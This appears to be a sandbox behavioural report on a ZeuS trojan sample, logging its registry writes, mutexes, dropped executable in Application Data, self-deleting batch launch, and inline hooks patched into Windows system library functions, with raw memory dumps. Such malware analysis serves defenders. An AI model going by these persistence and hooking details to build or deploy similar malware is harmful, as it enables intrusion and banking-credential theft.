C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 3B05D3
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 3B05D3
\KnownDlls\Normaliz.dll write and read and execute unknown 440000 36864 own pid read write conflicting addresses 1 3B05D3
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 3B05D3
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 3B05D3
\KnownDlls\NETAPI32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 3B05D3
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1 3B05D3
Registry Activities:
+ Key value set
Key Path Name Type Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Okmaykid Binary 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1 C09F1A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid ComputerName success or wait 1 414D3D
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft InstallDate success or wait 1 419EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft DigitalProductId buffer overflow 2 419F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft DigitalProductId success or wait 1 419F86
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Enabled object name not found 1 C09EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter EnabledV8 success or wait 1 C09EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter CleanCookies success or wait 1 C09FC6
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter CleanCookies success or wait 1 C09EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter 1406 success or wait 5 C09EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter 1609 success or wait 5 C09EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Okmaykid success or wait 1 C09F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Okmaykid success or wait 1 C09F86
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\{CADEDF10-E78D-E5A8-185B-81F8EE8A3A3D} success or wait 1 414C09
\BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 1 BFC0F6
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2E59-CCC3D8887706} success or wait 1 C04B82
Process Activities:
+ Process started
PID Filepath Cmdline Flags Completion Count Source Address
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 0 success or wait 1 4174EF
2536 C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat 0 success or wait 1 4174EF
+ Process terminated
PID Filepath Completion Count Source Address
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe success or wait 1 415816
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe success or wait 0 415816
Thread Activities:
+ Thread delayed
TID Delay Completion Count Source Address
10048 0s success or wait 39 417256
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C811195 1 8B success or wait 1 4155C7
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C811195 30 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94FABE 30 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D95EE89 30 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D9BA6BF 30 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D9BA666 30 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D949088 30 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94654B 30 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D963381 30 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94BF83 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94878D 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E42A97D 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E41A39A 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E42EA5E 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 C0A4F3
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0000 10 B8 35 00 00 00 E9 A9 D1 B6 7B success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C90D1AE 5 E9 33 B7 2E 84 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA000A 10 68 6C 02 00 00 E9 1E 63 B7 7B success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C91632D 5 E9 94 27 2E 84 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0014 10 8B FF 55 8B EC E9 7C 11 A7 7B success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C811195 5 E9 CE 79 3E 84 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA001E 10 8B FF 55 8B EC E9 9B FA BA 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94FABE 5 E9 97 45 2B C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0028 10 8B FF 55 8B EC E9 5C EE BB 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D95EE89 5 E9 20 52 2A C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0032 10 8B FF 55 8B EC E9 88 A6 C1 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D9BA6BF 5 E9 3E 9A 24 C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA003C 10 8B FF 55 8B EC E9 25 A6 C1 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D9BA666 5 E9 33 9B 24 C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0046 10 8B FF 55 8B EC E9 3D 90 BA 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D949088 5 E9 AD B1 2B C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0050 10 8B FF 55 8B EC E9 F6 64 BA 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94654B 5 E9 2D DD 2B C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA005A 10 8B FF 55 8B EC E9 22 33 BC 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D963381 5 E9 36 0F 2A C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0064 10 8B FF 55 8B EC E9 1A BF BA 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94BF83 5 E9 7E 83 2B C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA006E 10 8B FF 55 8B EC E9 1A 87 BA 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94878D 5 E9 A0 BB 2B C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0078 10 8B FF 55 8B EC E9 AE 3D D1 70 success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 71AB3E2B 5 E9 83 8A 14 8F success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0082 10 8B FF 55 8B EC E9 A0 4B D1 70 success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 71AB4C27 5 E9 BF 7C 14 8F success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA008C 10 8B FF 55 8B EC E9 69 68 D1 70 success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 71AB68FA 5 E9 0D 60 14 8F success or wait 1 C0A591
2536 C:\WINDOWS\system32\cmd.exe 140000 159744 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 00 success or wait 1 C0A688
2536 C:\WINDOWS\system32\cmd.exe 162D50 4 00 00 00 00 success or wait 1 C04C88
2536 C:\WINDOWS\system32\cmd.exe 162D64 4 00 00 14 00 success or wait 1 C04CA8
2536 C:\WINDOWS\system32\cmd.exe 163214 4 08 00 00 00 success or wait 1 C0442D
2536 C:\WINDOWS\system32\cmd.exe 163218 4 0C 00 00 00 success or wait 1 C0442D
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 380000 12FF1C page read and write success or wait 1 406915
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 380000 12FF20 page read and write success or wait 1 406915
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 381000 12FBFC page read and write success or wait 1 406915
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 390000 12FEA4 page execute and read and write success or wait 1 4014B4
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 390000 12FEA8 page execute and read and write success or wait 1 4014B4
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3B0000 12FEA8 page execute and read and write success or wait 1 40167E
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 400000 12FD60 page execute and read and write success or wait 1 3B0F29
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe B50000 12F910 page read and write success or wait 1 414961
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe B50000 12F914 page read and write success or wait 1 414961
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 181000 12F448 page read and write success or wait 1 4019F1
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 182000 12F448 page read and write success or wait 1 4019F1
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 183000 12F448 page read and write success or wait 1 4019F1
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe BD0000 12FAEC page read and write success or wait 1 41AED8
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe BD0000 12EF0C page read and write success or wait 1 41AED8
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe D20000 D1F6A8 page read and write success or wait 1 C04961
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe D20000 D1F6AC page read and write success or wait 1 C04961
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0000 D1F47C page execute and read and write success or wait 1 C01A36
2536 C:\WINDOWS\system32\cmd.exe 140000 12E674 page execute and read and write success or wait 1 C0A5F6
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 400000 1000 page read and write page readonly success or wait 1 4416D8
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 400000 1000 page readonly page read and write success or wait 1 4416ED
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 400000 27000 page execute and read and write page execute and read and write success or wait 1 3B0F37
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 400000 1000 page readonly page execute and read and write success or wait 1 3B1199
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 401000 21000 page execute read page execute and read and write success or wait 1 3B1217
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 422000 3000 page read and write page execute and read and write success or wait 1 3B1217
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 425000 2000 page readonly page execute and read and write success or wait 1 3B1217
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 410440 1000 page execute and read and write page execute read success or wait 1 41C089
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 410440 1000 page execute read page execute and read and write success or wait 1 41C0BC
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 C0A4CC
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0000 1000 page execute and read and write page execute and read and write success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0000 1000 page execute and read and write page execute and read and write success or wait 52 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C90D1AE 1000 page execute and read and write page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C90D000 1000 page execute and write copy page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 C0A5AD
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 C0A4CC
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA000A 1000 page execute and read and write page execute and read and write success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C91632D 1000 page execute and read and write page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C916000 1000 page execute and write copy page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 C0A5AD
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C811195 1000 page execute and read and write page execute read success or wait 1 C0A4CC
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0014 1000 page execute and read and write page execute and read and write success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C811195 1000 page execute and read and write page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C811000 1000 page execute and write copy page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C811195 1000 page execute read page execute and read and write success or wait 1 C0A5AD
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94FABE 1000 page execute and read and write page execute read success or wait 1 C0A4CC
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA001E 1000 page execute and read and write page execute and read and write success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94FABE 1000 page execute and read and write page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94F000 1000 page execute and write copy page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94FABE 1000 page execute read page execute and read and write success or wait 1 C0A5AD
2536 C:\WINDOWS\system32\cmd.exe 140000 27000 page execute and read and write page execute and read and write success or wait 2 C0A688
2536 C:\WINDOWS\system32\cmd.exe 162D50 1000 page execute and read and write page execute and read and write success or wait 1 C04C88
2536 C:\WINDOWS\system32\cmd.exe 162000 1000 page execute and read and write page execute and read and write success or wait 2 C04C88
2536 C:\WINDOWS\system32\cmd.exe 162D64 1000 page execute and read and write page execute and read and write success or wait 1 C04CA8
2536 C:\WINDOWS\system32\cmd.exe 163214 1000 page execute and read and write page execute and read and write success or wait 1 C0442D
2536 C:\WINDOWS\system32\cmd.exe 163000 1000 page execute and read and write page execute and read and write success or wait 2 C0442D
2536 C:\WINDOWS\system32\cmd.exe 163218 1000 page execute and read and write page execute and read and write success or wait 1 C0442D
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 1 C072E5
Token Activities:
+ Token privilege adjusted
Status Privilege Completion Count Source Address
on Security success or wait 1 417391
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 1968319188
Section loaded Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 1968323012
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 1968326607
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 1968328046
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 1968329191
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 1968329916
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 1968331434
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 1968331791
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 1968334388
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 1968337140
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 1968342749
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 1968344725
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 1968348039
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 1968352157
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 1968360620
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 1968367436
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 1968379313
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 1968382338
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 1968384407
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 370000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 1968398756
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page readonly success or wait 1968438036
